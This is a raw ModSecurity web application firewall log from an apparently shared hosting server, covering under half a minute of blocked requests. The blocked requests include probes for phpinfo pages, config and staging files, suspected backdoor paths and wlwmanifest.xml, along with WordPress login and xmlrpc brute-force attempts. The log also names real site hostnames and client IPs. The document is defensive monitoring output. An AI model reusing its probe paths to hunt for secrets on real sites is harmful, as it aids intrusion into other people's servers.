[Tue May 26 18:47:57.866502 2026] [security2:error] [pid 1025417:tid 1025448] [remote 216.73.216.30:35276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdhVHbArxonFeMXvQnewAALh4"]
[Tue May 26 18:47:58.738358 2026] [security2:error] [pid 1025417:tid 1025645] [client 20.29.64.60:2781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWdhlHbArxonFeMXvQnmAAAAGI"]
[Tue May 26 18:47:58.821419 2026] [security2:error] [pid 1025417:tid 1025444] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/queue.php"] [unique_id "ahWdhlHbArxonFeMXvQnnwAAHRo"]
[Tue May 26 18:47:59.028442 2026] [security2:error] [pid 1025417:tid 1025574] [client 20.29.64.60:2771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/jolvjosp.php"] [unique_id "ahWdh1HbArxonFeMXvQnoQAAABs"], referer: www.google.com
[Tue May 26 18:47:59.572362 2026] [security2:error] [pid 1025417:tid 1025660] [client 144.76.32.117:43834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.32.76.144.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodrc.com"] [uri "/index.php"] [unique_id "ahWdh1HbArxonFeMXvQnsgAAAHE"]
[Tue May 26 18:47:59.811437 2026] [security2:error] [pid 1025417:tid 1025669] [client 202.76.174.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdh1HbArxonFeMXvQnrQAAAHo"]
[Tue May 26 18:47:59.954234 2026] [security2:error] [pid 1025417:tid 1025667] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdh1HbArxonFeMXvQnwAAAAHg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 18:48:00.490423 2026] [security2:error] [pid 1025417:tid 1025607] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdiFHbArxonFeMXvQnwwAAADw"]
[Tue May 26 18:48:00.756363 2026] [security2:error] [pid 1025417:tid 1025459] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/services.php"] [unique_id "ahWdiFHbArxonFeMXvQnzAAAEik"]
[Tue May 26 18:48:00.877601 2026] [security2:error] [pid 1025417:tid 1025561] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdiFHbArxonFeMXvQn0AAAAA4"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 18:48:01.515911 2026] [security2:error] [pid 1025417:tid 1025644] [client 43.173.182.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWdiVHbArxonFeMXvQn5wAAAGE"]
[Tue May 26 18:48:02.795660 2026] [security2:error] [pid 1025417:tid 1025447] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/info"] [unique_id "ahWdilHbArxonFeMXvQoFwAAEh0"]
[Tue May 26 18:48:02.976864 2026] [security2:error] [pid 1025417:tid 1025610] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdilHbArxonFeMXvQoDwAAAD8"]
[Tue May 26 18:48:03.136619 2026] [security2:error] [pid 1025417:tid 1025462] [remote 216.73.216.30:16792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdi1HbArxonFeMXvQoIwAABSw"]
[Tue May 26 18:48:03.308155 2026] [security2:error] [pid 1025417:tid 1025595] [client 143.244.57.123:56058] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWdi1HbArxonFeMXvQoLQAAADA"]
[Tue May 26 18:48:04.226723 2026] [security2:error] [pid 1025417:tid 1025587] [client 143.244.57.123:56064] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWdjFHbArxonFeMXvQoRwAAACg"]
[Tue May 26 18:48:04.845416 2026] [security2:error] [pid 1025417:tid 1025574] [client 143.244.57.123:56074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWdjFHbArxonFeMXvQoUwAAABs"]
[Tue May 26 18:48:04.902147 2026] [security2:error] [pid 1025417:tid 1025610] [client 20.29.64.60:2757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWdjFHbArxonFeMXvQoVQAAAD8"]
[Tue May 26 18:48:05.084942 2026] [security2:error] [pid 1025417:tid 1025467] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/phpinfo.php3"] [unique_id "ahWdjVHbArxonFeMXvQoZAAAJzE"]
[Tue May 26 18:48:05.468435 2026] [security2:error] [pid 1025417:tid 1025666] [client 143.244.57.123:56084] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWdjVHbArxonFeMXvQodgAAAHc"]
[Tue May 26 18:48:05.504605 2026] [security2:error] [pid 1025417:tid 1025595] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdjVHbArxonFeMXvQoZgAAADA"]
[Tue May 26 18:48:05.808026 2026] [security2:error] [pid 1025417:tid 1025469] [remote 143.198.203.76:54988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWdjVHbArxonFeMXvQodwAANDM"]
[Tue May 26 18:48:06.102797 2026] [security2:error] [pid 1025417:tid 1025560] [client 143.244.57.123:56086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWdjlHbArxonFeMXvQoigAAAA0"]
[Tue May 26 18:48:06.741620 2026] [security2:error] [pid 1025417:tid 1025585] [client 143.244.57.123:56090] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWdjlHbArxonFeMXvQoqQAAACY"]
[Tue May 26 18:48:07.135821 2026] [security2:error] [pid 1025417:tid 1025490] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdjlHbArxonFeMXvQosQAAY0g"]
[Tue May 26 18:48:07.136038 2026] [security2:error] [pid 1025417:tid 1025646] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdjlHbArxonFeMXvQosQAAY0g"]
[Tue May 26 18:48:07.200859 2026] [security2:error] [pid 1025417:tid 1025498] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/_profiler/info"] [unique_id "ahWdj1HbArxonFeMXvQoxgAACVA"]
[Tue May 26 18:48:07.368768 2026] [security2:error] [pid 1025417:tid 1025655] [client 143.244.57.123:50272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWdj1HbArxonFeMXvQoygAAAGw"]
[Tue May 26 18:48:07.415676 2026] [security2:error] [pid 1025417:tid 1025656] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdjlHbArxonFeMXvQouQAAAG0"]
[Tue May 26 18:48:07.512251 2026] [security2:error] [pid 1025417:tid 1025499] [remote 31.24.44.107:37926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdj1HbArxonFeMXvQoxwAAIlE"]
[Tue May 26 18:48:07.928214 2026] [security2:error] [pid 1025417:tid 1025503] [remote 216.73.216.30:16792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdj1HbArxonFeMXvQo3QAAFlU"]
[Tue May 26 18:48:08.007338 2026] [security2:error] [pid 1025417:tid 1025598] [client 143.244.57.123:50282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWdkFHbArxonFeMXvQo3wAAADM"]
[Tue May 26 18:48:08.225849 2026] [security2:error] [pid 1025417:tid 1025501] [remote 31.24.44.107:37926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdkFHbArxonFeMXvQo5gAAZ1M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:08.634064 2026] [security2:error] [pid 1025417:tid 1025666] [client 143.244.57.123:50288] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWdkFHbArxonFeMXvQpBAAAAHc"]
[Tue May 26 18:48:09.149514 2026] [security2:error] [pid 1025417:tid 1025419] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/_phpinfo.php"] [unique_id "ahWdkVHbArxonFeMXvQpGwAATgE"]
[Tue May 26 18:48:09.265226 2026] [security2:error] [pid 1025417:tid 1025671] [client 143.244.57.123:50296] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWdkVHbArxonFeMXvQpHgAAAHw"]
[Tue May 26 18:48:09.825214 2026] [security2:error] [pid 1025417:tid 1025622] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdkVHbArxonFeMXvQpJgAAAEs"]
[Tue May 26 18:48:09.899665 2026] [security2:error] [pid 1025417:tid 1025604] [client 143.244.57.123:50300] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWdkVHbArxonFeMXvQpNAAAADk"]
[Tue May 26 18:48:10.518781 2026] [security2:error] [pid 1025417:tid 1025602] [client 143.244.57.123:50310] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWdklHbArxonFeMXvQpPwAAADc"]
[Tue May 26 18:48:11.001327 2026] [security2:error] [pid 1025417:tid 1025534] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/api/v1/phpinfo.php"] [unique_id "ahWdk1HbArxonFeMXvQpTQAAf3Q"]
[Tue May 26 18:48:11.152710 2026] [security2:error] [pid 1025417:tid 1025661] [client 143.244.57.123:50316] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWdk1HbArxonFeMXvQpTgAAAHI"]
[Tue May 26 18:48:11.807745 2026] [security2:error] [pid 1025417:tid 1025633] [client 143.244.57.123:50320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWdk1HbArxonFeMXvQpZgAAAFY"]
[Tue May 26 18:48:12.440895 2026] [security2:error] [pid 1025417:tid 1025649] [client 143.244.57.123:50336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kineticinfraprojects.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWdlFHbArxonFeMXvQpfgAAAGY"]
[Tue May 26 18:48:12.835722 2026] [security2:error] [pid 1025417:tid 1025536] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/php-info.php"] [unique_id "ahWdlFHbArxonFeMXvQpiwAALHY"]
[Tue May 26 18:48:12.839257 2026] [security2:error] [pid 1025417:tid 1025619] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdlFHbArxonFeMXvQpfAAAAEg"]
[Tue May 26 18:48:13.180504 2026] [security2:error] [pid 1025417:tid 1025428] [remote 216.73.216.30:26633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdlVHbArxonFeMXvQpmwAAdgo"]
[Tue May 26 18:48:14.709769 2026] [security2:error] [pid 1025417:tid 1025436] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/infophp.php"] [unique_id "ahWdllHbArxonFeMXvQpwwAAFBI"]
[Tue May 26 18:48:15.357170 2026] [security2:error] [pid 1025417:tid 1025628] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdllHbArxonFeMXvQpyQAAAFE"]
[Tue May 26 18:48:15.390565 2026] [security2:error] [pid 1025417:tid 1025641] [client 185.191.171.14:62778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-15-19/day/2024-03-27/"] [unique_id "ahWdl1HbArxonFeMXvQp2gAAAF4"]
[Tue May 26 18:48:15.390710 2026] [security2:error] [pid 1025417:tid 1025641] [client 185.191.171.14:62778] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-15-19/day/2024-03-27/"] [unique_id "ahWdl1HbArxonFeMXvQp2gAAAF4"]
[Tue May 26 18:48:16.645433 2026] [security2:error] [pid 1025417:tid 1025444] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/phpinfo"] [unique_id "ahWdmFHbArxonFeMXvQp-gAAHBo"]
[Tue May 26 18:48:17.404686 2026] [security2:error] [pid 1025417:tid 1025611] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdmFHbArxonFeMXvQqCwAAAEA"]
[Tue May 26 18:48:17.651308 2026] [security2:error] [pid 1025417:tid 1025443] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdmVHbArxonFeMXvQqJQAAPxk"]
[Tue May 26 18:48:17.651488 2026] [security2:error] [pid 1025417:tid 1025610] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdmVHbArxonFeMXvQqJQAAPxk"]
[Tue May 26 18:48:18.454739 2026] [security2:error] [pid 1025417:tid 1025455] [remote 222.165.190.235:53642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdmlHbArxonFeMXvQqMwAATSU"]
[Tue May 26 18:48:18.542533 2026] [security2:error] [pid 1025417:tid 1025447] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/api/aws/s3.ts"] [unique_id "ahWdmlHbArxonFeMXvQqQgAAPh0"]
[Tue May 26 18:48:20.367169 2026] [security2:error] [pid 1025417:tid 1025608] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdm1HbArxonFeMXvQqdwAAAD0"]
[Tue May 26 18:48:20.542353 2026] [security2:error] [pid 1025417:tid 1025469] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/staging.php"] [unique_id "ahWdnFHbArxonFeMXvQqhgAACDM"]
[Tue May 26 18:48:22.434761 2026] [security2:error] [pid 1025417:tid 1025471] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/staging.js"] [unique_id "ahWdnlHbArxonFeMXvQqvAAAMjU"]
[Tue May 26 18:48:22.905144 2026] [security2:error] [pid 1025417:tid 1025555] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdnlHbArxonFeMXvQqvwAAAAg"]
[Tue May 26 18:48:22.979605 2026] [security2:error] [pid 1025417:tid 1025491] [remote 216.73.216.30:26633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdnlHbArxonFeMXvQq0QAAYUk"]
[Tue May 26 18:48:24.453492 2026] [security2:error] [pid 1025417:tid 1025480] [remote 72.167.150.128:50304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdoFHbArxonFeMXvQq-AAART4"]
